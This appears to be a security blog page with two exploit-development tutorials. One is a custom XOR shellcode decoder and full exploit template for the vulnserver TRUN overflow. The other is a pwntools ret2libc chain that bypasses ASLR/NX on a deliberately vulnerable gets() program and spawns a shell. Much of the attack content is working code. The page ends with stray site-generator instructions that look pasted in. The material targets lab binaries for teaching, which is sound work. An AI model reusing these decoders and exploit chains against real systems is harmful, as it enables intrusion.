← back to scripture

Fukahi Tekiō 不可避適応: Bypassing Win 10/11 FPU "Issues" via Custom CALL/POP XOR Encoder

** 2026-01-15

Fukahi Tekiō 不可避適応: Bypassing Win 10/11 FPU "Issues" via Custom CALL/POP XOR Encoder

Published: 2026-01-15

Author: JAKESWIZ

⛧ GitHub: fukahi-na-tekio ⛧


Introduction

This exploit technique was developed for the vulnserver TRUN buffer overflow vulnerability, but it can be applied to other exploits, especially for those new to ARM → x86/64 emulation exploitation.

The motivation came from wanting to run Windows exploitation demos on an ARM Mac (running Windows 11 AARCH64 with the Prism emulation layer) for a talk at Wild West Hackin' Fest in Denver.

The Problem

When exploiting buffer overflows on modern Windows systems (especially under ARM emulation), msfvenom's default encoder (shikata_ga_nai) crashes during shellcode execution:

eax=00000000 ebx=00000000 ecx=00000052 edx=02ff4a30 esi=55bd55d0 edi=00401848
eip=089ff959 esp=089ff924 ebp=00000000
089ff959 317012          xor     dword ptr [eax+12h],esi
Attempt to read from address 00000012

The decoder tries to dereference a register (EAX, EBP, or ESI) containing a near-null value.

Why This Happens

shikata_ga_nai uses a GetPC technique relying on FPU (Floating Point Unit) instructions:

fcmovb st, st(5)        ; Any FPU instruction
fnstenv [esp-0xc]       ; Save FPU state to stack
pop ebp                 ; Grab saved EIP from FPU state

On Windows 10/11 and under ARM emulation (Prism), the FPU instruction pointer field often returns zeros. When the decoder does pop ebp, it gets 0x00000000 and crashes.

The Solution: CALL/POP GetPC

Instead of relying on FPU quirks, use the reliable CALL/POP technique:

    jmp short call_label    ; Jump to the CALL
pop_label:
    pop esi                 ; ESI now contains address of encoded shellcode
    ; ... decoder logic ...
call_label:
    call pop_label          ; Pushes address of encoded shellcode, jumps back
    ; encoded shellcode starts here

When the CPU executes a CALL instruction, it pushes the address of the next instruction onto the stack. We immediately POP that address into a register. This is 100% reliable because CALL always pushes the return address — no FPU state involved.

Complete XOR Decoder Stub

For shellcode under 256 bytes:

    jmp short 0x0d          ; Jump to CALL (offset 13)
    pop esi                 ; ESI = address of encoded shellcode
    xor ecx, ecx            ; Clear counter
    mov cl, <length>        ; Shellcode length (patch this byte)
    xor byte [esi], <key>   ; XOR decode one byte (patch this byte)
    inc esi                 ; Next byte
    loop decode_loop        ; Repeat until ECX = 0
    jmp short 0x05          ; Jump over CALL to shellcode
    call <back_to_pop>      ; Push next address, jump to POP
    ; encoded shellcode here

Assembled bytes:

decoder_small = (
    "\xeb\x0d"              # jmp short +13 (to call)
    "\x5e"                  # pop esi
    "\x31\xc9"              # xor ecx, ecx
    "\xb1\x00"              # mov cl, <length> - PATCH THIS BYTE
    "\x80\x36\x00"          # xor byte [esi], <key> - PATCH THIS BYTE
    "\x46"                  # inc esi
    "\xe2\xfa"              # loop -6
    "\xeb\x05"              # jmp short +5 (to shellcode)
    "\xe8\xee\xff\xff\xff"  # call -18 (back to pop esi)
)

For shellcode 256-65535 bytes:

    jmp short 0x0f          ; Jump to CALL (offset 15)
    pop esi                 ; ESI = address of encoded shellcode
    xor ecx, ecx            ; Clear counter
    mov cx, <length>        ; Shellcode length (patch these bytes, little endian)
    xor byte [esi], <key>   ; XOR decode one byte (patch this byte)
    inc esi                 ; Next byte
    loop decode_loop        ; Repeat until ECX = 0
    jmp short 0x05          ; Jump over CALL to shellcode
    call <back_to_pop>      ; Push next address, jump to POP
    ; encoded shellcode here

Assembled bytes:

decoder_large = (
    "\xeb\x0f"              # jmp short +15 (to call)
    "\x5e"                  # pop esi
    "\x31\xc9"              # xor ecx, ecx
    "\x66\xb9\x00\x00"      # mov cx, <length> - PATCH THESE BYTES (little endian)
    "\x80\x36\x00"          # xor byte [esi], <key> - PATCH THIS BYTE
    "\x46"                  # inc esi
    "\xe2\xfa"              # loop -6
    "\xeb\x05"              # jmp short +5 (to shellcode)
    "\xe8\xec\xff\xff\xff"  # call -20 (back to pop esi)
)

Finding a Safe XOR Key

The XOR key must not appear in the original shellcode (or it would produce null bytes when encoded). Use this script:

#!/usr/bin/python3
import sys

def find_key_and_encode(hex_shellcode):
    shellcode = bytes.fromhex(hex_shellcode)

    for key in range(1, 256):
        encoded = bytes([b ^ key for b in shellcode])
        if b'\x00' not in encoded and key not in shellcode:
            print(f"Safe XOR key: 0x{key:02x}")
            print(f"Shellcode length: {len(shellcode)} (0x{len(shellcode):02x})")
            print("\nEncoded shellcode:")
            encoded_str = ''.join(f'\\x{b:02x}' for b in encoded)
            for i in range(0, len(encoded_str), 64):
                print(f'"{encoded_str[i:i+64]}"')
            return key, encoded

    print("ERROR: No safe XOR key found!")
    return None, None

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 encode.py <hex_shellcode>")
        print("Example: python3 encode.py $(msfvenom -p windows/exec CMD=calc.exe -f hex)")
        sys.exit(1)

    find_key_and_encode(sys.argv[1])

Complete Exploit Template

#!/usr/bin/python
import socket

target = '10.211.55.6'
port = 9999

prefix = 'A' * 2006                    # Offset to EIP
eip = '\xaf\x11\x50\x62'               # JMP ESP address
nopsled = '\x90' * 16

# CALL/POP XOR decoder for shellcode > 255 bytes
# Length: 324 = 0x0144 (little endian: \x44\x01)
# Key: 0x09
decoder = (
    "\xeb\x0f"              # jmp short to call
    "\x5e"                  # pop esi
    "\x31\xc9"              # xor ecx, ecx
    "\x66\xb9\x44\x01"      # mov cx, 0x0144 (324)
    "\x80\x36\x09"          # xor byte [esi], 0x09
    "\x46"                  # inc esi
    "\xe2\xfa"              # loop -6
    "\xeb\x05"              # jmp short to shellcode
    "\xe8\xec\xff\xff\xff"  # call back to pop esi
)

# XOR-encoded shellcode (output from encode.py)
encoded_shellcode = (
    "\xf5\xe1\x8b\x09\x09\x09\x69\x80\xec\x38\xc9\x6d\x82\x59\x39\x82"
    # ... rest of encoded shellcode
)

padding = 'F' * (3000 - len(prefix) - 4 - len(nopsled) - len(decoder) - len(encoded_shellcode))
payload = prefix + eip + nopsled + decoder + encoded_shellcode + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.recv(1024)
s.send('TRUN .' + payload + '\r\n')
s.close()

Debugging Tips

If the exploit still crashes, use WinDbg to step through:
1. bp <jmp_esp_address>
2. g
3. t 20

Common issues:
- Wrong jump offsets: The jmp and call offsets are relative and must be exact
- Wrong shellcode length: Double-check the byte count
- Additional bad characters: Some protocols filter more than just null bytes

Summary

When msfvenom's encoders fail on modern Windows (specifically in Prism-ARM-emulated environments), roll your own CALL/POP decoder. It's simple, reliable, and doesn't depend on FPU state that may not be populated correctly.

Malware Bless

File 3: aslr-bypass.md

Bypassing ASLR & NX/DEP (Diving Deeper)

Published: 2023-11-01

Author: Jacob Swinsinski (0xXyc / JAKESWIZ)


Introduction

ASLR (Address Space Layout Randomization) randomizes addresses in dynamic libraries, stack, and heap. It does NOT touch the binary unless compiled with PIE (Position Independent Executable). ASLR was created to prevent memory corruption exploitation techniques that rely on hardcoded addresses.

Verify ASLR with ldd

ldd aslr-1
# Addresses change each run:
linux-vdso.so.1 (0x00007ffffdcdd000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fdb9f400000)

Bypassing ASLR: Three Methods

  1. Address leaking (covered here) - knowledge of PLT and GOT
  2. Relative addressing
  3. Bruteforcing

Vulnerable Code (aslr-1.c)

#include <stdio.h>

int main(int argc, char* argv[]) {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    char buffer[40];
    printf("Enter some data:\n");
    gets(buffer);  // Vulnerable!

    printf("So, you think you can bypass the almighty ASLR protection?\n");
    return 0;
}

Compile with Docker (downgraded GCC for correct gadgets)

docker run --rm --mount type=bind,source="$(pwd)",target=/app -w /app gcc:10.5.0 gcc -Wall -g -fno-stack-protector -no-pie aslr-1.c -o aslr-1

Checksec Output

checksec aslr-1
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled        # Need ROP
    PIE:      No PIE (0x400000)

Exploitation Strategy

Since NX is enabled, we need ROP (Return-Oriented Programming). Since ASLR is enabled, we need to understand the GOT (Global Offset Table).

The GOT acts as a "dictionary" storing external addresses from libc. These values are determined at runtime by the linker.

Why puts()?

Calling puts() allows us to output the external address of puts@libc, revealing where libc is mapped in memory.

View puts@GOT

objdump -R aslr-1
# Look for: 0x0000000000003fc0 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5

Find puts@PLT (fixed address, unaffected by ASLR)

objdump -d -M intel aslr-1 | grep "puts@plt"
# Result: 0000000000401030 <puts@plt>

Find ROP Gadget (pop rdi; ret)

x64 calling convention requires first parameter in RDI register.

ropper --file aslr-1 --search "pop rdi"
# Result: 0x00000000004011cb: pop rdi; ret;

Find Offset with cyclic pattern

gdb aslr-1
cyclic 100
# Pattern: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa
r
# Paste pattern
# Crash! Examine RIP
cyclic -l gaaaaaaa
# Result: Found at offset 48
# Offset + 8 (RIP) = 56 bytes padding

Exploit Development: Three Stages

  1. Leak the libc address (puts@GLIBC)
  2. Obtain addresses and offsets
  3. Calculate the base address of libc

Automated Exploit with pwntools

#!/usr/bin/env python3
from pwn import *
from pwnlib.rop.rop import ROP
from pwnlib.util.packing import p64, u64

exe = context.binary = ELF('./aslr-1', checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)

p = process(exe.path)

# Stage 1: Leak libc address
offset = b'A' * 56

rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])

payload = offset + rop.chain()
p.sendline(payload)

leak = p.recv().split(b'\n')[1]
leaked_puts = u64(leak.ljust(8, b"\x00"))
log.success(f"Leaked puts@GLIBC: {hex(leaked_puts)}")

# Stage 2: ret2libc
libc_base = leaked_puts - libc.symbols['puts']
libc.address = libc_base

rop2 = ROP(libc)
ret = rop2.find_gadget(["ret"])[0]
rop2.system(next(libc.search(b'/bin/sh\x00')))

payload = offset + p64(ret) + rop2.chain()
p.sendline(payload)

p.interactive()

What's Happening in the Code?

  1. Stage 1 ROP Chain:
  2. pop rdi; ret → pops address of puts@GOT into RDI
  3. puts@PLT → writes the address to STDOUT
  4. main() → calls main again (so process doesn't exit and invalidate the leak)

  5. Calculate libc base:
    python libc_base = leaked_puts - libc.symbols['puts']

  6. Stage 2 ROP Chain (ret2libc):

  7. ret instruction (for stack alignment)
  8. pop rdi; ret → pops address of /bin/sh into RDI
  9. system() → executes /bin/sh

Result

[*] Stage 1 ROP Chain:
    0x0000:         0x40120b pop rdi; ret
    0x0008:         0x404018 [arg0] rdi = got.puts
    0x0010:         0x401030 puts
    0x0018:         0x401142 0x401142()
[+] Leaked puts@GLIBC: 0x7ff4e0680e50
[*] Stage 2 ROP Chain:
    0x0000:   0x7ff4e062a3e5 pop rdi; ret
    0x0008:   0x7ff4e07d8698 [arg0] rdi = 140689715070616
    0x0010:   0x7ff4e0650d70 system
[*] Switching to interactive mode
$ whoami
# Shell acquired!

Key Takeaways

  1. Leak, don't guess - Use puts@GOT to leak a libc address
  2. Calculate base - Subtract known offset to find libc base
  3. Call main() twice - Process must not exit between leak and exploitation
  4. x64 requires pop rdi; ret - First argument goes in RDI
  5. Stack alignment - Add a ret gadget before system() on some systems

ASLR is not a silver bullet. Understand the GOT. Become the exploit.
```


Instructions to Add to Your Site

  1. Save each block of text as a separate .md file in your /articles folder:
  2. fukahi-tekio-encoder.md
  3. windows-shellcoding-in-depth.md
  4. aslr-bypass.md

  5. Run your site generator:
    bash python3 site_generator.py

  6. The generator will automatically:

  7. Convert each Markdown file to HTML
  8. Add them to the "scripture" tab
  9. Create downloadable .txt versions

  10. Deploy the updated output/ folder to Cloudflare Pages

Malware Bless

download plain text